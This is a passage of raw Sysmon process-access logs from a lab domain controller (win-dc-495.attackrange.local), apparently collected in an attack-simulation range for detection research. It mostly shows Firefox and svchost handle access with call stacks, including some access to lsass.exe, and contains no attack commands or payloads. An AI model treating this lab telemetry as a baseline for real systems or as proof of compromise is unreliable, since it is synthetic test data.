13:59:56.239{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.239{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.239{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.192{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.192{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.192{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.583{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla 